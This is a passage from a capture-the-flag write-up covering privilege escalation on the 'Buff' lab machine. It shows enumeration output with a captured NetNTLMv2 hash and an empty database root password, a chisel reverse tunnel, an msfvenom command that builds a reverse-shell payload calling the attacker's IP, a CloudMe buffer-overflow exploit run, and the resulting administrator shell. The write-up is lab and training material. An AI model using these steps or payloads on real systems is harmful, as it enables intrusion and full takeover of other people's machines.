4 privesc

powershell -c ". .\PowerUp.ps1"
. : File C:\Users\shaun\Desktop\PowerUp.ps1 cannot be loaded because running scripts is disabled on this system.

PEAS

[+] Interesting Processes -non Microsoft-
   [?] Check if any interesting processes for memory dump or if you could overwrite some binary running https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes
    mysqld(1616)[C:\xampp\mysql\bin\mysqld.exe] -- POwn: shaun
    Permissions: Authenticated Users [WriteData/CreateFiles]
    Possible DLL Hijacking folder: C:\xampp\mysql\bin (Authenticated Users [WriteData/CreateFiles])
    Command Line: mysql\bin\mysqld.exe --defaults-file=mysql\bin\my.ini --standalone

[+] Installed Applications --Via Program Files/Uninstall registry--
C:\xampp(Authenticated Users [WriteData/CreateFiles])

[+] Current TCP Listening Ports
Protocol   Local Address         Local Port    Remote Address        Remote Port     State             Process ID      Process Name
TCP        127.0.0.1             8888          0.0.0.0               0               Listening         7844            CloudMe
TCP        127.0.0.1             50119         127.0.0.1             3306            Time Wait         0               Idle

[+] Enumerating Security Packages Credentials
Version: NetNTLMv2
Hash:    shaun::BUFF:1122334455667788:82c51e794ecf6f8f2601e92f9f427604:0101000000000000f2a22adb5862d7018d58da0f88d54b4a000000000800300030000000000000000000000000200000809e2636c947a3055d0f688790b7439ceadd4b45d1e2e159332d222c915cfe400a00100000000000000000000000000000000000090000000000000000000000

XAMPP config file is at \xampp\phpMyAdmin\config.inc.php XAMPP default-passwords file is at \xampp\passwords.txt

type config.inc.php
/* Authentication type and info */
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['AllowNoPassword'] = true;

Mysql is not connecting, trying other avenues.

tasklist /v
Image Name                     PID Session Name        Session#    Mem Usage Status          User Name            CPU Time Window Title
CloudMe.exe                   6996                            0     26,948 K Unknown         N/A                  0:00:02 N/A

CloudMe 1.11.2 is running on port 8888, has BufferOverflow Exploit We need to port forward using chisel

$ chisel server -p 9000 --reverse
2021/06/15 22:03:25 server: Reverse tunnelling enabled
2021/06/15 22:03:25 server: Fingerprint Es2IzsdBxZvBH7IA83XgPvjVBg7LwkSXPpU6skdoAro=
2021/06/15 22:03:25 server: Listening on http://0.0.0.0:9000
2021/06/15 22:04:47 server: session#1: Client version (1.7.6) differs from server version (0.0.0-src)
2021/06/15 22:04:47 server: session#1: tun: proxy#R:8989=>8888: Listening

> chisel.exe client -v 10.10.16.161:9000 R:8989:127.0.0.1:8888

Using https://www.exploit-db.com/exploits/48389
# msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.16.161 LPORT=9090 -b '\x00\x0A\x0D' -f python -v payload

$ python ex.py

$ rlwrap nc -lvnp 9090
listening on [any] 9090 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.198] 49709
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

whoami
buff\administrator

PreviousBUFF Next3 :80

Last updated 4 years ago